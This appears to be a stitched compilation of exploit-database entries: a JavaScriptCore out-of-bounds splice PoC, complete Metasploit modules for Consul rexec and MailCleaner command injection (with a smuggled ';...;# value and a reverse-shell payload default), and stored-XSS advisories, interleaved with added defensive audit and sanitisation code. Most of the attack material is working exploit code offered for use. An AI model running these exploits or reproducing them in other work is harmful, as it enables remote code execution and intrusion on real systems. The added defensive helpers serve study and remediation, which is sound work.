Considering the comment, I think the method is supposed to prevent an array with holes from reaching the line "storage->m_numValuesInVector -= count". But such arrays can actually get there as long as the holesMustForwardToPrototype method returns false, and unless the array has indexed accessors on it or Proxy objects in its prototype chain, that method simply returns false. So "storage->m_numValuesInVector" can be controlled by the user.

In the PoC, m_numValuesInVector is changed to 0xfffffff0, which equals the new length, so the hasHoles method returns false, leading to OOB reads/writes in the JSArray::unshiftCountWithArrayStorage method.

PoC:
*/

function main() {
    let arr = [1];

    arr.length = 0x100000;
    arr.splice(0, 0x11);

    arr.length = 0xfffffff0;
    arr.splice(0xfffffff0, 0, 1);
}

main();
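Added illustration, not from the report: a Python model of the two ArrayStorage counters, replaying the PoC's first four statements with 32-bit wraparound to show how m_numValuesInVector lands on 0xfffffff0 and why hasHoles() then answers false. The hasHoles() definition, the `present` set and the exact=True variant are my own assumptions; the final splice that performs the out-of-bounds access is not modelled.

```python
MASK32 = 0xFFFFFFFF  # both counters are 32-bit unsigned in ArrayStorage


class ArrayStorageModel:
    """Only the ArrayStorage state the report discusses: length,
    m_numValuesInVector and which slots really hold a value."""

    def __init__(self, values, holes_must_forward_to_prototype=False):
        self.length = len(values)
        self.present = {i for i, v in enumerate(values) if v is not None}
        self.num_values_in_vector = len(self.present)
        # False for an ordinary array: no indexed accessors and no Proxy in
        # the prototype chain, which is what lets the PoC reach the fast path.
        self.holes_must_forward_to_prototype = holes_must_forward_to_prototype

    def has_holes(self):
        # Assumed reading of ArrayStorage::hasHoles(): the two counters disagree.
        return self.num_values_in_vector != self.length

    def grow(self, new_length):
        """arr.length = N with N >= length: the new slots are holes, so only
        length moves and m_numValuesInVector is left alone."""
        if new_length < self.length:
            raise ValueError("shrinking is not modelled here")
        self.length = new_length & MASK32

    def shift_count(self, count, exact=False):
        """arr.splice(0, count) through the fast path quoted above.

        exact=False subtracts `count`, as the quoted code does; exact=True
        subtracts the number of non-hole slots actually removed, which is
        what m_numValuesInVector is meant to track."""
        old_length = self.length
        if count > old_length:
            raise AssertionError("RELEASE_ASSERT(count <= oldLength)")
        if self.has_holes() and self.holes_must_forward_to_prototype:
            return False  # the generic ArrayPrototype path would run instead
        removed_values = sum(1 for i in self.present if i < count)
        self.present = {i - count for i in self.present if i >= count}
        delta = removed_values if exact else count
        self.num_values_in_vector = (self.num_values_in_vector - delta) & MASK32
        self.length = (old_length - count) & MASK32
        return True


def replay_poc(exact=False):
    """The first four statements of the PoC's main(), applied to the model."""
    storage = ArrayStorageModel([1])   # let arr = [1];
    storage.grow(0x100000)             # arr.length = 0x100000;
    storage.shift_count(0x11, exact)   # arr.splice(0, 0x11);
    storage.grow(0xfffffff0)           # arr.length = 0xfffffff0;
    return storage


if __name__ == "__main__":
    s = replay_poc()
    # 1 - 0x11 wraps to 0xfffffff0; the last statement makes length match it,
    # so hasHoles() answers False for an array that is almost entirely holes.
    print(hex(s.num_values_in_vector), hex(s.length), s.has_holes())  # 0xfffffff0 0xfffffff0 False
    print(replay_poc(exact=True).has_holes())                           # True
```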
            
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Hashicorp Consul Remote Command Execution via Rexec",
      'Description'    => %q{
        This module exploits a feature of Hashicorp Consul named rexec.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Bharadwaj Machiraju <bharadwaj.machiraju[at]gmail.com>', # Discovery and PoC
          'Francis Alexander <helofrancis[at]gmail.com>', # Discovery and PoC
          'Quentin Kaiser <kaiserquentin[at]gmail.com>' # Metasploit module
        ],
      'References'     =>
        [
          [ 'URL', 'https://www.consul.io/docs/agent/options.html#disable_remote_exec' ],
          [ 'URL', 'https://www.consul.io/docs/commands/exec.html'],
          [ 'URL', 'https://github.com/torque59/Garfield' ]
        ],
      'Platform'        => 'linux',
      'Targets'         => [ [ 'Linux', {} ] ],
      'Payload'         => {},
      'CmdStagerFlavor' => [ 'bourne', 'echo', 'printf', 'wget', 'curl' ],
      'Privileged'     => false,
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Aug 11 2018'))
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path', '/']),
        OptBool.new('SSL', [false, 'Negotiate SSL/TLS for outgoing connections', false]),
        OptInt.new('TIMEOUT', [false, 'The timeout to use when waiting for the command to trigger', 20]),
        OptString.new('ACL_TOKEN', [false, 'Consul Agent ACL token', '']),
        Opt::RPORT(8500)
      ])
  end

  def check
    uri = target_uri.path
    res = send_request_cgi({
      'method'  => 'GET',
      'uri' => normalize_uri(uri, "/v1/agent/self"),
      'headers' => {
        'X-Consul-Token' => datastore['ACL_TOKEN']
      }
    })
    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end
    begin
      agent_info = JSON.parse(res.body)
      if agent_info["Config"]["DisableRemoteExec"] == false || agent_info["DebugConfig"]["DisableRemoteExec"] == false
        return CheckCode::Vulnerable
      else
        return CheckCode::Safe
      end
    rescue JSON::ParserError
      vprint_error 'Failed to parse JSON output.'
      return CheckCode::Unknown
    end
  end

  def execute_command(cmd, opts = {})
    uri = target_uri.path

    print_status('Creating session.')
    res = send_request_cgi({
      'method' => 'PUT',
      'uri' => normalize_uri(uri, 'v1/session/create'),
      'headers' => {
        'X-Consul-Token' => datastore['ACL_TOKEN']
      },
      'ctype' => 'application/json',
      'data' => {:Behavior => "delete", :Name => "Remote Exec", :TTL => "15s"}.to_json
    })

    unless res && res.code == 200
      fail_with(Failure::UnexpectedReply, 'Failed to create a rexec session.')
    end

    begin
      sess = JSON.parse(res.body)
      print_status("Got rexec session ID #{sess['ID']}")
    rescue JSON::ParserError
      fail_with(Failure::Unknown, 'Failed to parse JSON output.')
    end

    print_status("Setting command for rexec session #{sess['ID']}")
    res = send_request_cgi({
      'method' => 'PUT',
      'uri' => normalize_uri(uri, "v1/kv/_rexec/#{sess['ID']}/job?acquire=#{sess['ID']}"),
      'headers' => {
        'X-Consul-Token' => datastore['ACL_TOKEN']
      },
      'ctype' => 'application/json',
      'data' => {:Command => "#{cmd}", :Wait => 2000000000}.to_json
    })
    if res.nil? || res.code != 200 || res.body == 'false'
      fail_with(Failure::Unknown, 'An error occurred when contacting the Consul API.')
    end

    print_status("Triggering execution on rexec session #{sess['ID']}")
    res = send_request_cgi({
      'method' => 'PUT',
      'uri' => normalize_uri(uri, "v1/event/fire/_rexec"),
      'headers' => {
        'X-Consul-Token' => datastore['ACL_TOKEN']
      },
      'ctype' => 'application/json',
      'data' => {:Prefix => "_rexec", :Session => "#{sess['ID']}"}.to_json
    })
    if res.nil? || res.code != 200
      fail_with(Failure::Unknown, 'An error occurred when contacting the Consul API.')
    end

    begin
      Timeout.timeout(datastore['TIMEOUT']) do
        res = send_request_cgi({
          'method' => 'GET',
          'uri' => normalize_uri(uri, "v1/kv/_rexec/#{sess['ID']}/?keys=&wait=2000ms"),
          'headers' => {
            'X-Consul-Token' => datastore['ACL_TOKEN']
          }
        })
        begin
          data = JSON.parse(res.body)
          break if data.include? 'out'
        rescue JSON::ParserError
          fail_with(Failure::Unknown, 'Failed to parse JSON output.')
        end
        sleep 2
      end
    rescue Timeout::Error
      # we catch this error so cleanup still happen afterwards
      print_status("Timeout hit, error with payload ?")
    end

    print_status("Cleaning up rexec session #{sess['ID']}")
    res = send_request_cgi({
      'method' => 'PUT',
      'uri' => normalize_uri(uri, "v1/session/destroy/#{sess['ID']}"),
      'headers' => {
        'X-Consul-Token' => datastore['ACL_TOKEN']
      }
    })

    if res.nil? || res.code != 200 || res.body == 'false'
      fail_with(Failure::Unknown, 'An error occurred when contacting the Consul API.')
    end

    res = send_request_cgi({
      'method' => 'DELETE',
      'uri' => normalize_uri(uri, "v1/kv/_rexec/#{sess['ID']}?recurse="),
      'headers' => {
        'X-Consul-Token' => datastore['ACL_TOKEN']
      }
    })

    if res.nil? || res.code != 200 || res.body == 'false'
      fail_with(Failure::Unknown, 'An error occurred when contacting the Consul API.')
    end
  end

  def exploit
    execute_cmdstager()
  end
end
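Added audit helper for defenders, not part of either Metasploit module above: it reads the /v1/agent/self document that both check methods inspect and reports which of the two paths (script checks via the services API, rexec) is open, with the agent option that closes it. The agent documents are constructed; enable_local_script_checks and the rexec default come from Consul's documentation rather than from this page.

```python
import json

# Constructed sample of GET /v1/agent/self for an agent exposed on both paths
# (not a real capture).
SAMPLE_AGENT_SELF = json.dumps({
    "Config": {"Datacenter": "dc1", "NodeName": "node-a", "Server": False},
    "DebugConfig": {
        "EnableScriptChecks": True,        # script checks accepted over the HTTP API
        "EnableLocalScriptChecks": False,
        "EnableRemoteScriptChecks": False,
        "DisableRemoteExec": False,        # `consul exec` jobs still honoured
    },
})

# The same agent after hardening (also constructed).
HARDENED_AGENT_SELF = json.dumps({
    "Config": {"Datacenter": "dc1", "NodeName": "node-a", "Server": False},
    "DebugConfig": {
        "EnableScriptChecks": False,
        "EnableLocalScriptChecks": True,   # checks from local config files only
        "EnableRemoteScriptChecks": False,
        "DisableRemoteExec": True,
    },
})


def _flag(doc, name):
    """Read a boolean from DebugConfig, falling back to Config, because the
    modules above look in both places; None when the agent reports neither."""
    for section in ("DebugConfig", "Config"):
        value = doc.get(section, {}).get(name)
        if isinstance(value, bool):
            return value
    return None


def audit_agent_self(body):
    """Return one finding per command-execution path the agent leaves open."""
    doc = json.loads(body)
    findings = []

    # Path 1 (services module): PUT /v1/agent/service/register carrying a
    # script check. EnableScriptChecks or EnableRemoteScriptChecks is what
    # makes the agent run that script on its interval.
    if _flag(doc, "EnableScriptChecks") or _flag(doc, "EnableRemoteScriptChecks"):
        findings.append({
            "path": "services API script checks",
            "fix": "enable_script_checks = false; use enable_local_script_checks "
                   "= true if checks defined in local config files are needed",
        })

    # Path 2 (rexec module): session + _rexec/<session>/job KV entry + _rexec
    # event. DisableRemoteExec=false means the agent will pick the job up.
    if _flag(doc, "DisableRemoteExec") is False:
        findings.append({
            "path": "rexec",
            "fix": "disable_remote_exec = true (the default since Consul 0.8)",
        })

    return findings


if __name__ == "__main__":
    for finding in audit_agent_self(SAMPLE_AGENT_SELF):
        print("OPEN: {path} -> {fix}".format(**finding))
    print("hardened agent findings:", audit_agent_self(HARDENED_AGENT_SELF))  # []
```

Independently of these flags, ACLs in default-deny mode keep an unauthenticated caller away from both endpoints, which is why both modules carry an ACL_TOKEN option.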
            
# Exploit Title: Embed Video Scripts - Cross-Site Scripting (Stored)
# Google Dork: N/A
# Date: 1 Jan 2019
# Exploit Author: Deyaa Muhammad
# Author EMail: contact [at] deyaa.me
# Author Blog: http://deyaa.me
# POC Video: https://youtu.be/2CFJLwkxpT8
# Vendor Homepage: https://codeawesome.in/embed/
# Software Link: https://codecanyon.net/item/embed-video-scripts/20831073
# Demo Website: https://codeawesome.in/embed/
# Version: N/A
# Tested on: WIN7_x68/Linux
# CVE : N/A

# Description:
A stored XSS was found in the "Embed Video Scripts" comments section.

# POC Request:

:method: POST
:authority: server
:scheme: https
:path: /embed/comments
content-length: 145
accept: */*
origin: https://server
x-requested-with: XMLHttpRequest
user-agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
content-type: application/x-www-form-urlencoded; charset=UTF-8
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: __cfduid=de9f1151befbf3ccdb372b7c1afb0a3bb1546252540
cookie: _tccl_visitor=208f2702-6472-41aa-b129-088a32f1eda6
cookie: _tccl_visit=208f2702-6472-41aa-b129-088a32f1eda6

message=<script>alert('Deyaa)</script>&post_id=1&save=1&avatar=https%3A%2F%2Fserver%2Fembed%2Fassets%2Fimages%2Favatar%2F1.png
            
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Mailcleaner Remote Code Execution",
      'Description'    => %q{
        This module exploits a command injection vulnerability in the MailCleaner Community Edition product. An authenticated user can execute an
        operating system command in the context of the web server user, which is root.

        The /admin/managetracing/search/search endpoint takes several user inputs and passes them to an internal service that is responsible for executing
        operating system commands. One of the user inputs is passed to the service without proper validation, which causes a command injection vulnerability.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
        ],
      'References'     =>
        [
          ['URL', 'https://pentest.blog/advisory-mailcleaner-community-edition-remote-code-execution/']
        ],
      'DefaultOptions'  =>
        {
          'SSL' => true,
          'WfsDelay' => 5,
          'Payload'  => 'python/meterpreter/reverse_tcp'
        },
      'Platform'       => ['python', 'unix'],
      'Arch'           => [ ARCH_PYTHON, ARCH_CMD ],
      'Targets'        =>
        [
          [
            'Python payload',
            {
              'Platform' => 'python',
              'Arch' => ARCH_PYTHON,
            }
          ],
          [
            'Command payload',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Payload' =>
              {
                'BadChars' => "\x26",
              }
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Dec 19 2018",
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        Opt::RPORT(443),
        OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']),
        OptString.new('USERNAME', [true, 'The username to login as']),
        OptString.new('PASSWORD', [true, 'The password to login with'])
      ]
    )
  end

  def username
    datastore['USERNAME']
  end

  def password
    datastore['PASSWORD']
  end

  def auth
    print_status('Performing authentication...')

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'admin/')
    })

    if res && !res.get_cookies.empty?
      cookie = res.get_cookies
    else
      fail_with(Failure::UnexpectedReply, 'Did not get cookie-set header from response.')
    end

    # Performing authentication
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'admin/'),
      'cookie'    => cookie,
      'vars_post' => {
        'username'  => username,
        'password' => password,
        'submit' => 'Log+in'
      }
    })

    if res && res.code == 302
      print_good("Awesome..! Authenticated with #{username}:#{password}")
    else
      fail_with(Failure::NoAccess, 'Credentials are not valid.')
    end

    cookie
  end

  def exploit
    cookie = auth

    if cookie.nil?
      fail_with(Failure::Unknown, 'Something went wrong!')
    end

    print_status('Exploiting command injection flaw')

    if target['Arch'] == ARCH_PYTHON
      cmd = "';$(python -c \"#{payload.encoded}\");#"
    else
      cmd = "';#{payload.encoded};#"
    end

    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'admin', 'managetracing', 'search', 'search'),
      'cookie'    => cookie,
      'vars_post' => {
        'search' => rand_text_alpha(5),
        'domain' => cmd,
        'submit' => 1
      }
    })

  end
end
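The module above reaches the command injection by sending a `domain` value of the form `';<command>;#`, which only works because the application splices the field into a shell command line. The Ruby below is an added defensive example, not part of the Metasploit module or of the affected product, showing the two controls that close this class of bug: a strict hostname allowlist check on the field, and an argv-style command build that never passes the value through a shell. The function names (`valid_hostname?`, `trace_argv`, `audit_domain_values`) and the `traceroute` command are assumptions made for illustration; the page does not say which binary the application runs.

```ruby
# Strict hostname allowlist (RFC 1123 style labels): letters, digits and
# hyphens, 1-63 chars per label, no leading or trailing hyphen, at most
# 253 chars overall, optional trailing dot. Nothing else is accepted.
HOSTNAME_RE = /\A(?=.{1,253}\z)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.?\z/i

def valid_hostname?(value)
  value.is_a?(String) && HOSTNAME_RE.match?(value)
end

# Vulnerable pattern (shown for contrast only): the user-supplied value is
# interpolated into one shell string, so quotes, ';' and '$(...)' inside it
# are interpreted by /bin/sh. Single quotes around the value do not help,
# because the injected value simply closes them.
def vulnerable_command(domain)
  "traceroute '#{domain}'"   # hypothetical command; assumed for illustration
end

# Hardened pattern: validate first, then build an argv array. Passing an
# array (not a string) to Process.spawn/system skips the shell entirely, so
# metacharacters in the argument are never interpreted. A validated hostname
# can also never start with '-', so it cannot be parsed as an option.
def trace_argv(domain)
  raise ArgumentError, 'invalid hostname' unless valid_hostname?(domain)
  ['traceroute', domain]
end

# For log or database review: characters that a legitimate hostname can never
# contain but that a shell would interpret.
SHELL_META = /[;&|`$'"(){}<>\\\n]/

def looks_like_injection?(value)
  SHELL_META.match?(value.to_s)
end

# Returns the values that fail the allowlist AND carry shell metacharacters,
# i.e. the ones worth investigating rather than plain typos.
def audit_domain_values(values)
  values.reject { |v| valid_hostname?(v) }.select { |v| looks_like_injection?(v) }
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample values: two normal hostnames and the page's injection shape.
  sample = ['example.com', "';id;#", 'mail.example.org.']
  puts audit_domain_values(sample).inspect
  puts trace_argv('example.com').inspect
end
```

The audit helper is the part a responder would run over captured POST bodies or stored search history after applying the vendor fix: anything it returns is a request that was trying to break out of the command string, not a mistyped domain.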
            
# Exploit Title: MyBB OUGC Awards Plugin v1.8.3 - Cross-Site Scripting
# Date: 12/31/2018
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://community.mybb.com/mods.php?action=view&pid=396
# Version: 1.8.3
# Tested on: Ubuntu 18.04
# CVE: CVE-2019-3501


1. Description:
The OUGC Awards plugin for the MyBB forum allows admins and moderators to grant awards to users, which are then displayed on profiles and posts. The reason input isn't sanitized on the awards page or on user profiles.
 

2. Proof of Concept:

- Have a moderator-level account or higher
- Go to Manage Awards in ModCP
- Give an award to a user and enter the payload as the reason:   <script>alert('XSS')</script>

- The payload executes when the award is viewed on awards.php and on user profiles.


3. Solution:
Update to 1.8.19
            
# Exploit Title: LayerBB 1.1.1 - Cross-Site Scripting
# Date: 10/4/2018
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://forum.layerbb.com/downloads.php?view=file&id=26
# Version: 1.1.1
# Tested on: Ubuntu 18.04
# CVE: CVE-2018-17997


1. Description:
LayerBB is free open-source forum software. The XSS allows users to place a payload in the title of a conversation (PM).
 

2. Proof of Concept:

- Start a new conversation addressed to any user (victim) you want
- Use the payload as the title:  <script>alert('XSS')</script>
- The next time the user (victim) visits the site, the payload will execute


3. Solution:
Update to 1.1.2
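Both advisories above (the OUGC Awards reason field and the LayerBB conversation title) are the same defect: text stored by one user is later written into HTML for other users without output encoding. The Ruby below is an added example, not code from MyBB, OUGC Awards or LayerBB, showing the raw interpolation beside its escaped form and a small check for payloads that are already sitting in the database after an upgrade. The function names (`render_unsafe`, `render_escaped`, `find_stored_markup`) and the row layout are assumptions made for illustration.

```ruby
require 'cgi'

# Vulnerable rendering (for contrast): the stored text goes into the page
# as-is, so a reason or title of <script>alert('XSS')</script> becomes live
# markup for every moderator, profile visitor or PM recipient who views it.
def render_unsafe(css_class, text)
  "<div class=\"#{css_class}\">#{text}</div>"
end

# Hardened rendering: encode at output time for the HTML body context.
# CGI.escapeHTML turns & < > " ' into entities, so the stored text is shown
# literally and the browser never sees a tag. Note that this is the right
# encoder for element content and double-quoted attributes only; a value
# placed inside a URL or a script block needs that context's own encoder.
def render_escaped(css_class, text)
  "<div class=\"#{CGI.escapeHTML(css_class)}\">#{CGI.escapeHTML(text)}</div>"
end

# Remediation check: updating the plugin or forum stops new payloads from
# being stored, but rows written before the fix are still there. This flags
# any stored text that contains a tag, an inline event handler or a
# javascript: URL so it can be reviewed or cleaned.
MARKUP_RE = /<\s*\/?\s*[a-z][^>]*>|\bon[a-z]+\s*=|javascript:/i

def find_stored_markup(rows)
  rows.select { |row| MARKUP_RE.match?(row[:text].to_s) }
end

# Constructed sample rows standing in for award reasons / PM titles.
SAMPLE_ROWS = [
  { id: 1, text: 'Helpful member of the year' },
  { id: 2, text: "<script>alert('XSS')</script>" },
  { id: 3, text: 'Re: meeting <3' },
  { id: 4, text: '<img src=x onerror=alert(1)>' }
].freeze

if __FILE__ == $PROGRAM_NAME
  puts render_unsafe('reason', SAMPLE_ROWS[1][:text])
  puts render_escaped('reason', SAMPLE_ROWS[1][:text])
  puts find_stored_markup(SAMPLE_ROWS).map { |r| r[:id] }.inspect
end
```

The scan deliberately accepts "<3" and other stray angle brackets that are not followed by a tag name, so it produces few false positives on real forum text; anything it does return should be escaped on display anyway, which is why the encoder, not the scan, is the actual fix.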